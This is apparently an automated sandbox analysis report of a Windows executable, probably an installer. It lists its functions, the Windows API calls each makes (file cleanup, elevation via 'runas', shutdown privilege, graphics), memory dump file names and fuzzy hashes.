Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 5e2741f406a566ac20dd53898cd79c442441464cd05229c01c6d26d87152863f
Instruction ID: 760e6ac4e30c85a6c7c9acfda4d72fc248caca873c4b92e09980cd14d23c5683
Opcode Fuzzy Hash: 5e2741f406a566ac20dd53898cd79c442441464cd05229c01c6d26d87152863f
Instruction Fuzzy Hash: C7B012E3F302401ACB007AFE0CC180D00CC951860E7110C3FB006E31D3D43EC8140118

Uniqueness

Uniqueness Score: -1.00%

Function 004A9F0C, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,004AA140,?,?,004E8BCD), ref: 004A9F2A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c0535405a76d831c59bf5f7c6fd907554cdae2bedac7e3e3af526ae19ceb5bc3
Instruction ID: f7c41e12ee128d4a381138607c33ccee541f4a807847e82ea38e017367583f72
Opcode Fuzzy Hash: c0535405a76d831c59bf5f7c6fd907554cdae2bedac7e3e3af526ae19ceb5bc3
Instruction Fuzzy Hash: E2D092B4620101DFDB208B26ED8634A33A1F3A0309F404126F600C21A2D33C888DEF04

Uniqueness

Uniqueness Score: -1.00%

Function 004DEED0, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,004FDE18,00000000,004FDE27,?,?,?,?,?,004FE903), ref: 004DEEE6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d8a337a32023b26eba30e4956a836eeebeeb05029b9e3211bb96f63b1fa3a7ae
Instruction ID: 28ea42c322a716706993fcd1f6882b91b1f43e75a6720400b664436bda87e8f8
Opcode Fuzzy Hash: d8a337a32023b26eba30e4956a836eeebeeb05029b9e3211bb96f63b1fa3a7ae
Instruction Fuzzy Hash: 56C002B15502109EC741EF7AEC2A7093AE4A36F345F084A2BA445C62A2E73C8549EF84

Uniqueness

Uniqueness Score: -1.00%

Function 00408DCE, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00408DD4

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: ce29b5d2e090cee81fdcbee02132d35637f2953bf04ff818f1586bc486ffd9c4
Instruction ID: 49db0b3b33c2bf6e97ae97d93976948e2610fce81232a523bb2059fdc29b762b
Opcode Fuzzy Hash: ce29b5d2e090cee81fdcbee02132d35637f2953bf04ff818f1586bc486ffd9c4
Instruction Fuzzy Hash: 20B012246084020BC504A72D4C4344F31C01A40224FC42634785CE56D2F62DC9B503DF

Uniqueness

Uniqueness Score: -1.00%

Function 004E4640, Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(00000000,00000012,00000000,00000000), ref: 004E4648

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 57cc08e797efc8b24daf2bb9c27526a3c8ecd3a0e5511ddb6681cb39e489e839
Instruction ID: 7f4d6a844817934f8bc4e34315b360424fc7030a3d0182e2a244835bc74453a6
Opcode Fuzzy Hash: 57cc08e797efc8b24daf2bb9c27526a3c8ecd3a0e5511ddb6681cb39e489e839
Instruction Fuzzy Hash: 6BA002343C430530F5B431510D03F4400001744F05EE0505573087C0D304DC2854201D

Uniqueness

Uniqueness Score: -1.00%

Function 00413CAF, Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00413CB1), ref: 00413CA4

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 534a8ee811bc55c6c9a8c602d35d62d22f7629fd39b459a8fdb9d8c680905833
Instruction ID: 754c34c688c062f3ad774ae1f62c56ccb4e6504a3f1d33e77c3a12713a2d13f6
Opcode Fuzzy Hash: 534a8ee811bc55c6c9a8c602d35d62d22f7629fd39b459a8fdb9d8c680905833
Instruction Fuzzy Hash: 00A0223BC00000F2CF00AEE0C00088C33382A083003C008833008B3082F03C8A00030C

Uniqueness

Uniqueness Score: -1.00%

Function 0042BD08, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,0050BC38,00000000,00000000,?,0042BE6B,00000000,00000B06,00000000,00400000,00000000,00000000,00000000), ref: 0042BD26

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b1b39261860be757938f1e3b03389e4a1231d0f724abb6382cc17b64e77e588a
Instruction ID: 6b31fb2f33bbe4fe12c45ac344cf3817c842f0af1773a987dad5548b9ca9cf69
Opcode Fuzzy Hash: b1b39261860be757938f1e3b03389e4a1231d0f724abb6382cc17b64e77e588a
Instruction Fuzzy Hash: 2D114C343403199FC710DF19D881B86BBE5FF58350F50C53AE9988B385D374E9058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004AD804, Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,004AD870), ref: 004AD852

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: ead1f182d4bc557158a8d7a75a1c7f5afcaf6fb7894ed86ff90b817f4fdf3820
Instruction ID: dc377ecba4bc59826d84f5731e4709c3e0bd63d95e98ea8b0dad1aa82d21acd3
Opcode Fuzzy Hash: ead1f182d4bc557158a8d7a75a1c7f5afcaf6fb7894ed86ff90b817f4fdf3820
Instruction Fuzzy Hash: 7B01FC71A042086F8711DB6A9C514BEBBE8DB5A320750427BF424D3681DA3C9E1096A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00434448, Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(00000000,00000054,?,00000000,?,00000000,?,00434C12,00000000,?,00000000,00434CC3,?,?,?,00000000), ref: 004344C8
GetDC.USER32(00000000), ref: 004344D9
CreateCompatibleDC.GDI32(00000000), ref: 004344EA
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00434536
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043455A
SelectObject.GDI32(?,?), ref: 004347B7
SelectPalette.GDI32(?,00000000,00000000), ref: 004347F7
RealizePalette.GDI32(?), ref: 00434803
SetTextColor.GDI32(?,00000000), ref: 0043486C
SetBkColor.GDI32(?,00000000), ref: 00434886
SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,00434A14,00434A14,?,00000000,00000000,00434A14), ref: 004348CE
FillRect.USER32 ref: 00434854

Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 004348F0
CreateCompatibleDC.GDI32(00000000), ref: 00434903
SelectObject.GDI32(00434D0B,00000000), ref: 00434926
SelectPalette.GDI32(00434D0B,00000000,00000000), ref: 00434942
RealizePalette.GDI32(00434D0B), ref: 0043494D
SetTextColor.GDI32(00434D0B,00000000), ref: 0043496B
SetBkColor.GDI32(00434D0B,00000000), ref: 00434985
BitBlt.GDI32(?,00000000,00000000,?,?,00434D0B,00000000,00000000,00CC0020), ref: 004349AD
SelectPalette.GDI32(00434D0B,00000000,000000FF), ref: 004349BF
SelectObject.GDI32(00434D0B,00000000), ref: 004349C9
DeleteDC.GDI32(00434D0B), ref: 004349E4

Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: a547df16d9d45c743b2e04442f89ff0603482c87bfc6ba3c0a06317c7910bba4
Instruction ID: f1df2df15a4d58b172ea2e73916dc75ef4af8a8e80b15d768e357f7c63fd91c8
Opcode Fuzzy Hash: a547df16d9d45c743b2e04442f89ff0603482c87bfc6ba3c0a06317c7910bba4
Instruction Fuzzy Hash: E812BB75A00208AFDB10EFA9C885F9E77B8EB4C314F159556F914EB2A2C778ED40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00408174, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 152stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,0040B314,?,00000000), ref: 00408191
GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 004081A8
lstrcpynW.KERNEL32(?,?,?), ref: 004081D8
lstrcpynW.KERNEL32(?,?,?,kernel32.dll,0040B314,?,00000000), ref: 00408247
lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,0040B314,?,00000000), ref: 0040828F
FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,?,00000000), ref: 004082A2
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,?,00000000), ref: 004082B8
lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,?,00000000), ref: 004082C4
lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,?), ref: 00408300
lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314), ref: 0040830C
lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 0040832F

Strings

\, xrefs: 004082D6
kernel32.dll, xrefs: 0040818C
GetLongPathNameW, xrefs: 0040819F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 3245196872-3908791685
Opcode ID: d23ac2dccd6c5904ed4ebb122041d1f5d384be88246b7f3bb0063985ae1c4c9b
Instruction ID: 250bcaa9846f6036ca752eb7000dfcf737f83f99ccb7def8f15fd4b0e8f234fa
Opcode Fuzzy Hash: d23ac2dccd6c5904ed4ebb122041d1f5d384be88246b7f3bb0063985ae1c4c9b
Instruction Fuzzy Hash: A3519472E005189BDB10EBE4CD85ADE73BCAF44310F1445BEA944F7290EB789E41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004D8F68, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 004D8D84: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DB0
Part of subcall function 004D8D84: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DC9
Part of subcall function 004D8D84: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DF3
Part of subcall function 004D8D84: CloseHandle.KERNEL32(00000000), ref: 004D8E11

Part of subcall function 004D8E94: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,004D8F27,?,?,00000000,?,004D8F9F,00000000,004D90B7,?,?,?), ref: 004D8EC3

ShellExecuteExW.SHELL32(0000003C), ref: 004D8FEF
GetLastError.KERNEL32(00000000,004D90B7,?,?,?), ref: 004D8FF8
MsgWaitForMultipleObjects.USER32 ref: 004D9045
GetExitCodeProcess.KERNEL32 ref: 004D906B
CloseHandle.KERNEL32(00000000,004D909C,00000000,00000000,000000FF,000000FF,00000000,004D9095,?,00000000,004D90B7,?,?,?), ref: 004D908F

Strings

ShellExecuteEx, xrefs: 004D9009
<, xrefs: 004D8FAE
MsgWaitForMultipleObjects, xrefs: 004D9054
runas, xrefs: 004D8FBC
GetExitCodeProcess, xrefs: 004D9074
ShellExecuteEx returned hProcess=0, xrefs: 004D9019

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 254331816-221126205
Opcode ID: c9dfc9ad7b6890e72b9480f390e9dc5b40f54eccb7605cf1f2b30a9eb56ad370
Instruction ID: 0ceec1fc157af90cc67455280caa66068deec0621c71cd14981735221fdfa72d
Opcode Fuzzy Hash: c9dfc9ad7b6890e72b9480f390e9dc5b40f54eccb7605cf1f2b30a9eb56ad370
Instruction Fuzzy Hash: CA318270E04219AADF11EFA6D861A9EB6B8EB09318F50443FF514E6381DB7C8D00CB19

Uniqueness

Uniqueness Score: -1.00%

Function 004FDF38, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004FE07B,?,00000000,0050B17C,?,004FE232,00000000,004FE286,?,00000000,00000000,00000000), ref: 004FDF89
SetFileAttributesW.KERNEL32(00000000,00000010), ref: 004FE00C
DeleteFileW.KERNEL32(00000000), ref: 004FE01A
FindNextFileW.KERNEL32(000000FF,?,00000000,004FE04E,?,00000000,?,00000000,004FE07B,?,00000000,0050B17C,?,004FE232,00000000,004FE286), ref: 004FE02A
FindClose.KERNEL32(000000FF,004FE055,004FE04E,?,00000000,?,00000000,004FE07B,?,00000000,0050B17C,?,004FE232,00000000,004FE286), ref: 004FE048

Strings

isRS-???.tmp, xrefs: 004FDF71
isRS-, xrefs: 004FDFA9

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$AttributesCloseDeleteFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 1425421994-3422211394
Opcode ID: 628fec11c63022e258a1722f62acac43e199b2df37220a97fafc366c5d592758
Instruction ID: cb4ba5ba77a75789e263aba167a119555d3d55a2da80293cad247d0a0f68a6fd
Opcode Fuzzy Hash: 628fec11c63022e258a1722f62acac43e199b2df37220a97fafc366c5d592758
Instruction Fuzzy Hash: 7531987090466CAFCB10DF66CC45A9EB7F9EB84304F5144FBA905B3291EA7C9E408A18

Uniqueness

Uniqueness Score: -1.00%

Function 004B00AC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 004B00BC
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004B00C2
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004B00DB
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004B0102
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004B0107
ExitWindowsEx.USER32(00000002,00000000), ref: 004B0118

Strings

SeShutdownPrivilege, xrefs: 004B00D4

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: ef9d41a7b5daaa718b69dd9ca2d444d7aee655285940df61ceddb449c0489ae7
Instruction ID: 2d82122e82644b5eda749e0f008ebc2aa4b636d5a7613be086f7d44d70cf5359
Opcode Fuzzy Hash: ef9d41a7b5daaa718b69dd9ca2d444d7aee655285940df61ceddb449c0489ae7
Instruction Fuzzy Hash: EEF0C8306453017AE614AA758C07FAF72C8AB44B05F50082AB640E61C3D7BED904863F

Uniqueness

Uniqueness Score: -1.00%

Function 00481238, Relevance: 9.1, APIs: 6, Instructions: 90windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00481265
GetWindowLongW.USER32(?,000000F0), ref: 0048127E
GetWindowLongW.USER32(?,000000EC), ref: 0048129A
GetActiveWindow.USER32 ref: 004812A3
MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 004812D0
SetActiveWindow.USER32(?,0048134C,00000000,?), ref: 004812F1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveLong$IconicMessage
String ID:
API String ID: 1633107849-0
Opcode ID: f9589785e3a2c896c84c0147047eb20fceea969faa9c834ceed2f7dffbcdc7f9
Instruction ID: 912c38e0a71ac18bf281b613dd81c7be8c9f18af2e7e4ce1aaaee03cd0e7779b
